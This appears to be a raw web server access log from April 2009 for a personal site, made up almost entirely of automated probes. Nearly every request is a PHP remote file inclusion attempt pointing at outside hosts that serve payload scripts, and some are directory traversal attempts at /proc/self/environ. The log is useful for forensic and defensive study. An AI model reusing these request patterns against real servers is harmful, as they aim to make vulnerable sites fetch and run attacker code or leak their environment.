200.69.106.77 - - [28/Apr/2009:11:23:15 -0700] "GET /logs/access_080708.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.69.106.77 - - [28/Apr/2009:11:23:15 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
124.0.73.2 - - [28/Apr/2009:11:23:16 -0700] "GET /logs/access_080331.log//_head.php?_zb_path=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.97.95.186 - - [28/Apr/2009:11:23:38 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 200 97193 "-" "libwww-perl/5.79" "www.dmulk.com"
77.221.130.18 - - [28/Apr/2009:11:24:01 -0700] "GET /logs/access_080525.log%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://208.98.22.241/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:11:24:02 -0700] "GET /logs/access_081027.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.195.124.10 - - [28/Apr/2009:11:24:02 -0700] "GET /logs/access_081107.log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://indoirc.go.ro/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:11:24:02 -0700] "GET /logs/access_080702.log//phpSecurePages/secure.php?&cfgProgDir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:11:24:02 -0700] "GET /phpSecurePages/secure.php?&cfgProgDir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:24:04 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:11:24:05 -0700] "GET /logs//phpSecurePages/secure.php?&cfgProgDir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:24:11 -0700] "GET /logs/access_090217.log//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:24:11 -0700] "GET /logs/access_080222.log//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:24:11 -0700] "GET /logs//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 200 97193 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:24:12 -0700] "GET /logs/access_080222.log//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:24:12 -0700] "GET /logs/access_090217.log//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:24:12 -0700] "GET /logs//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 200 97193 "-" "Mozilla/5.0" "www.dmulk.com"
200.69.106.77 - - [28/Apr/2009:11:24:18 -0700] "GET /logs/access_080708.log/administrator/components/com_remository/errors.php?error=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.69.106.77 - - [28/Apr/2009:11:24:18 -0700] "GET /logs/access_080213.log/administrator/components/com_remository/errors.php?error=http://westvirginiahuntingforum.com/Smileys/v4id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:24:20 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:24:41 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
203.97.95.186 - - [28/Apr/2009:11:24:46 -0700] "GET /?path%5Bdocroot%5D=http://www.vueltacarnero.com//////////modules/Roseid.txt? HTTP/1.1" 200 43372 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:24:47 -0700] "GET //include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:24:47 -0700] "GET /logs///include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:24:47 -0700] "GET /logs/access_090322.log///include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.134.10.54 - - [28/Apr/2009:11:24:47 -0700] "GET /logs/access_080331.log%20%20///skin/zero_vote/error.php?%20dir=http://xplcc.t35.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:24:47 -0700] "GET /logs/access_081124.log///include/print_category.php?setup[use_category]=1&dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:24:54 -0700] "GET /logs/access_080730.log///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [28/Apr/2009:11:24:57 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:25:01 -0700] "GET /?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:25:21 -0700] "GET /?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 200 43320 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:25:32 -0700] "GET /logs/access_080222.log%20%20//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:25:32 -0700] "GET /logs/access_090217.log%20%20//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.104.37.122 - - [28/Apr/2009:11:25:35 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://data.donkeyhote.co.kr/xsl/copyright.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.825" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:25:36 -0700] "GET /logs/access_081119.log//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.22.204.193 - - [28/Apr/2009:11:25:37 -0700] "GET /include/write.php?dir=http://91.203.132.162/.q/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:25:50 -0700] "GET /logs/access_090127.log/main.php?site=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:25:50 -0700] "GET /logs/access_090127.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:25:51 -0700] "GET /logs/access_090127.log/main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:25:51 -0700] "GET /logs/access_090127.log/main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:13 -0700] "GET /main.php?site=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:14 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:14 -0700] "GET /logs/main.php?site=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:14 -0700] "GET /main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:14 -0700] "GET /logs/access_080430.log/main.php?site=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:14 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:15 -0700] "GET /main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.0" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:15 -0700] "GET /logs/access_080430.log/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:15 -0700] "GET /logs/main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:15 -0700] "GET /logs/access_080430.log/main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:15 -0700] "GET /logs/main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.122.39.99 - - [28/Apr/2009:11:26:16 -0700] "GET /logs/access_080430.log/main.php?site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:16 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:17 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:17 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:31 -0700] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:31 -0700] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:34 -0700] "GET /logs/access_080304.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:34 -0700] "GET /logs/access_080209.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:26:36 -0700] "GET /logs/access_080622.log/admincp/auth/checklogin.php?cfgProgDir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
217.147.29.190 - - [28/Apr/2009:11:26:36 -0700] "GET /logs/access_080623.log/admincp/auth/checklogin.php?cfgProgDir=http://olesya.biz/aJz.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
117.74.99.225 - - [28/Apr/2009:11:26:49 -0700] "GET /logs/access_080209.log/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://basic-it.de/phpShop/soap/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:11:27:40 -0700] "GET /logs/access_081105.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:11:27:40 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:11:27:40 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:27:49 -0700] "GET /logs/access_080222.log%20%20//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.30.194 - - [28/Apr/2009:11:27:49 -0700] "GET /logs/access_090217.log%20%20//?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
210.68.188.206 - - [28/Apr/2009:11:27:57 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://www.koreavan.kr/technote6//data/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
208.43.107.9 - - [28/Apr/2009:11:28:07 -0700] "GET /logs/access_080730.log///?_SERVER[DOCUMENT_ROOT]=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
82.141.129.7 - - [28/Apr/2009:11:28:18 -0700] "GET /logs/access_080304.log//include.php?path[docroot]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.129.7 - - [28/Apr/2009:11:28:18 -0700] "GET /logs/access_080430.log//include.php?path[docroot]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.129.7 - - [28/Apr/2009:11:28:18 -0700] "GET /logs//include.php?path[docroot]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.141.129.7 - - [28/Apr/2009:11:28:18 -0700] "GET /include.php?path[docroot]=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:28:27 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:28:27 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:28:27 -0700] "GET /logs/access_080720.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:11:28:27 -0700] "GET /logs/access_080702.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:28:39 -0700] "GET /logs/access_080712.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:29:01 -0700] "GET /bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:29:05 -0700] "GET /logs/access_080720.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:29:05 -0700] "GET /logs//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:10 -0700] "GET /db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:10 -0700] "GET /logs/access_080828.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:10 -0700] "GET /logs/access_080404.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:10 -0700] "GET /logs/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:10 -0700] "GET /logs/access_080404.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:10 -0700] "GET /logs/access_080828.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:11 -0700] "GET /db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:11 -0700] "GET /logs/access_080828.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:11 -0700] "GET /logs/access_080404.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:11 -0700] "GET /logs/access_080828.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:11 -0700] "GET /logs/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [28/Apr/2009:11:29:11 -0700] "GET /logs/access_080404.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
62.140.23.192 - - [28/Apr/2009:11:29:20 -0700] "GET /logs/access_090123.log%20%20//phpSecurePages/secure.php?&cfgProgDir=http://plengeh.co.cc/scripts/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:29:29 -0700] "GET /logs/access_081120.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.10.167.106 - - [28/Apr/2009:11:30:00 -0700] "GET /logs/access_081120.log%20%20//bbs/include/print_category.php?setup[use_category]=1&dir=http://www.sunggong.tv/bc/shirohige/fxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:11:30:46 -0700] "GET /components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:11:30:46 -0700] "GET /logs/access_081105.log//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [28/Apr/2009:11:30:46 -0700] "GET /logs//components/com_virtuemart/export.php?mosConfig_absolute_path=http://aboutav.com/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.93.54.77 - - [28/Apr/2009:11:31:42 -0700] "GET /admin.php?include_path=http://onlin3.freehostia.com/glup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:31:52 -0700] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:31:52 -0700] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:31:52 -0700] "GET /logs/access_080322.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
201.232.54.48 - - [28/Apr/2009:11:32:01 -0700] "GET /logs/access_080215.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://plengeh.co.cc/scripts/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:28 -0700] "GET /logs/access_080828.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:28 -0700] "GET /logs/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:28 -0700] "GET /logs/access_080404.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:28 -0700] "GET /db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:43 -0700] "GET /logs/access_080404.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:43 -0700] "GET /logs/access_090304.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:32:56 -0700] "GET /logs/access_080708.log%20%20///include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:32:56 -0700] "GET /logs///include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.106.109.88 - - [28/Apr/2009:11:32:56 -0700] "GET //include/write.php?dir=http://pallmall4.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:59 -0700] "GET /logs/access_080712.log%20%20//modules/4nAlbum/public/displayCategory.php?basepath=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:59 -0700] "GET /db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:59 -0700] "GET /logs/access_080828.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:59 -0700] "GET /logs/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:32:59 -0700] "GET /logs/access_080404.log/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:33:16 -0700] "GET /logs/access_080404.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
220.79.47.122 - - [28/Apr/2009:11:33:17 -0700] "GET /logs/access_090304.log%20%20/db.php?path_local=http://www.winewise.de///administrator/components/com_virtuemart/uiu.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
174.129.107.128 - - [28/Apr/2009:11:33:21 -0700] "GET /logs/access_080527.log HTTP/1.1" 200 1179648 "-" "AISearchBot (Email: aisearchbot@gmail.com; If your web site doesn't want to be crawled, please send us a email.)" "www.dmulk.com"
